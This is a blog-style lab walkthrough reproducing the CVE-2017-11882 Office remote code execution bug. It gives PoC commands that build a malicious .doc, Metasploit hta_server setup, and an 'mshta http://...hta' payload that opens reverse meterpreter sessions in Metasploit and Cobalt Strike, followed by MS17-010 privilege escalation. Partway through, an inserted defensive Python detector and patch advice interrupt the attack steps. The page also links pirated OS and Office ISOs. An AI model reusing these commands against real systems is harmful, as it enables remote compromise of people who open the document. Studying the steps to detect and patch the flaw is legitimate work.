
CVE-2017-11882 Office RCE Reproduction


JieGe


Preface

The Office remote code execution vulnerability that lay dormant for 17 years (CVE-2017-11882) affects versions from Office 2000 through the then-latest Office 2016; an attacker can exploit it to execute arbitrary commands as the currently logged-in user.

Environment

System                    Office
Windows 7 SP1 Ultimate    Office 2016

Windows 7 SP1 Ultimate Thunder (Xunlei) download link:

    ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

Office 2016 Thunder (Xunlei) download link:

    ed2k://|file|cn_office_professional_plus_2016_x86_x64_dvd_6969182.iso|2588266496|27EEA4FE4BB13CD0ECCDFC24167F9E01|/

POC

Project address: https://github.com/Ridter/CVE-2017-11882

Pop-up

Using the Command109b_CVE-2017-11882.py script directly generates a doc Word file that carries the command; when the victim opens it, the pop-up appears straight away:

Bash

    python Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
    [*] Done ! output file --> test.doc

(screenshot: 16022436788418.png)

But a pop-up like this is meaningless. And because the command executed through this vulnerability runs as the currently logged-in user, if the target is not a high-privilege user you cannot directly add an administrator, since UAC cannot be bypassed. So the plan is to get a session in MSF or CS first and escalate privileges later.

Getting a session in MSF

MSF IP          Victim
10.20.24.244    Windows 7 SP1

hta generation

hta is an HTML Application; most Windows operating systems support executing hta files, using mshta.exe to parse and run the .hta file. The .hta file here can be local or on a reachable remote host.
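From the defender's side, the chain described on this page leaves a distinctive process-creation trail: the document's command is launched by EQNEDT32.EXE (the Equation Editor process in which the CVE-2017-11882 overflow lives, which normally spawns nothing), and the second-stage payload is mshta.exe pulling an .hta from a remote URL. The following is an added example, not code from the page or from the Ridter project: a hypothetical Python detector over Sysmon-style process-creation records (fields UtcTime, Image, ParentImage, CommandLine). The sample records are constructed, and the EQNEDT32.EXE and WINWORD.EXE paths are assumed install locations.

```python
"""Hypothetical detector for the CVE-2017-11882 process chain (added example).

Consumes Sysmon-style process-creation records (Event ID 1 fields UtcTime,
Image, ParentImage, CommandLine) and reports which rules each record trips.
The sample records below are constructed for this example; the EQNEDT32.EXE
and WINWORD.EXE paths are assumed install locations, not data from the page.
"""
import ntpath
import re
from typing import Dict, List, Tuple

# Office hosts that should essentially never spawn a shell or script host.
# EQNEDT32.EXE (Equation Editor) is the process the CVE-2017-11882 overflow
# runs in, and in normal use it spawns no child processes at all.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {
    "mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)


def _base(image: str) -> str:
    """Lower-cased file name of a Windows path (ntpath works off-box too)."""
    return ntpath.basename(image).lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the record matches (empty if benign)."""
    hits: List[str] = []
    image = _base(event.get("Image", ""))
    parent = _base(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")

    # Rule 1: any child of Equation Editor is suspicious on its own.
    if parent == "eqnedt32.exe":
        hits.append("equation-editor-child-process")
    # Rule 2: an Office host launching a shell or script interpreter.
    if parent in OFFICE_HOSTS and image in SCRIPT_HOSTS:
        hits.append("office-spawned-script-host")
    # Rule 3: mshta.exe loading an .hta from a remote URL (the page's callback).
    if image == "mshta.exe" and REMOTE_URL.search(cmdline):
        hits.append("mshta-remote-hta")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Keep only flagged records as (UtcTime, image name, matched rules)."""
    flagged = []
    for ev in events:
        hits = classify(ev)
        if hits:
            flagged.append((ev.get("UtcTime", ""), _base(ev.get("Image", "")), hits))
    return flagged


# Constructed sample telemetry: a benign Word launch, Equation Editor being
# started by DCOM, the two child processes from the page's two payloads, and
# two benign look-alikes that must not fire.
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WINWORD = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"UtcTime": "2020-10-09 10:00:01", "Image": WINWORD,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"' + WINWORD + '" /n "C:\\Users\\sec\\Desktop\\exp.doc"'},
    {"UtcTime": "2020-10-09 10:00:03", "Image": EQNEDT,
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": '"' + EQNEDT + '" -Embedding'},
    {"UtcTime": "2020-10-09 10:00:04", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": EQNEDT, "CommandLine": "cmd.exe /c calc.exe"},
    {"UtcTime": "2020-10-09 10:00:05", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": EQNEDT,
     "CommandLine": "mshta http://10.20.24.244:8080/n8Zw0EKX.hta"},
    {"UtcTime": "2020-10-09 10:05:00", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\sec\Desktop\local.hta"},
    {"UtcTime": "2020-10-09 10:06:00", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe"},
]


if __name__ == "__main__":
    for when, image, hits in triage(SAMPLE_EVENTS):
        print(f"{when}  {image:<12} {', '.join(hits)}")
```

Rule 1 is the one worth keeping even after the Office patch is applied, since legitimate Equation Editor use never needs a child process; rule 3 catches the remote-hta stage regardless of which parent launched mshta.exe. The durable fix is the November 2017 Office update for CVE-2017-11882 (Microsoft removed Equation Editor entirely in January 2018); for hosts that cannot be patched, Microsoft's advisory workaround disables the Equation Editor COM object by setting "Compatibility Flags" to 0x400 under HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}.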

Bash

    msf5 > use exploit/windows/misc/hta_server

    # set up the reverse HTTP callback
    msf5 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_http
    payload => windows/meterpreter/reverse_http

    msf5 exploit(windows/misc/hta_server) > set lhost 10.20.24.244
    lhost => 10.20.24.244

    msf5 exploit(windows/misc/hta_server) > set lport 6666
    lport => 6666

    msf5 exploit(windows/misc/hta_server) > exploit -j
    [*] Exploit running as background job 0.
    [*] Exploit completed, but no session was created.

    [*] Started HTTP reverse handler on http://10.20.24.244:6666

    msf5 exploit(windows/misc/hta_server) > [*] Using URL: http://0.0.0.0:8080/n8Zw0EKX.hta
    [*] Local IP: http://10.20.24.244:8080/n8Zw0EKX.hta
    [*] Server started.


EXP generation

Use the py script directly to write the command you want executed into the doc file:

Bash

    python Command109b_CVE-2017-11882.py -c "mshta http://10.20.24.244:8080/n8Zw0EKX.hta" -o exp.doc
    [*] Done ! output file --> exp.doc

The victim opened the doc document and the session came in successfully:

(screenshot: 16022485769058.png)

Getting a session in CS

Because the MSF and CS sessions use the same protocol, you can simply change the payload above to point at the CS listener, and the session then comes in directly.

Listener

CS IP           MSF IP          Victim
10.11.38.147    10.20.24.244    Windows 7 SP1

(screenshot: 16022488802243.png)

Just this one ordinary listener is all that is needed.

hta generation

CS also comes with built-in hta generation; everyone should be familiar with that, so Guoguang won't say more about it here. Below, Guoguang explains how to use the MSF payload to get a session directly in CS; straight to the commands:

Bash

    msf5 > use exploit/windows/misc/hta_server

    msf5 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_http
    payload => windows/meterpreter/reverse_http

    # fill in the CS listener information directly here
    msf5 exploit(windows/misc/hta_server) > set lhost 10.11.38.147
    lhost => 10.11.38.147

    msf5 exploit(windows/misc/hta_server) > set lport 5555
    lport => 5555

    msf5 exploit(windows/misc/hta_server) > exploit -j
    [*] Exploit running as background job 0.
    [*] Exploit completed, but no session was created.

    [-] Handler failed to bind to 10.11.38.147:5555
    [*] Started HTTP reverse handler on http://0.0.0.0:5555
    msf5 exploit(windows/misc/hta_server) > [*] Using URL: http://0.0.0.0:8080/rjw00gEIB5.hta
    [*] Local IP: http://10.20.24.244:8080/rjw00gEIB5.hta
    [*] Server started.


EXP generation

Use the py script directly to write the command you want executed into the doc file:

Bash

    python Command109b_CVE-2017-11882.py -c "mshta http://10.20.24.244:8080/rjw00gEIB5.hta" -o exp.doc
    [*] Done ! output file --> exp.doc

The victim opened the doc document, and on the CS side the session came in successfully:

(screenshot: 16022493171209.png)

Privilege escalation

The current user is the sec user; the classic MS17-010 can be used directly to escalate privileges:

(screenshot: 16022494122974.png)

Then fill in the victim's IP information:

(screenshot: 16022495696477.png)

Click GO and the privilege escalation succeeds:

(screenshot: 16022495923523.png)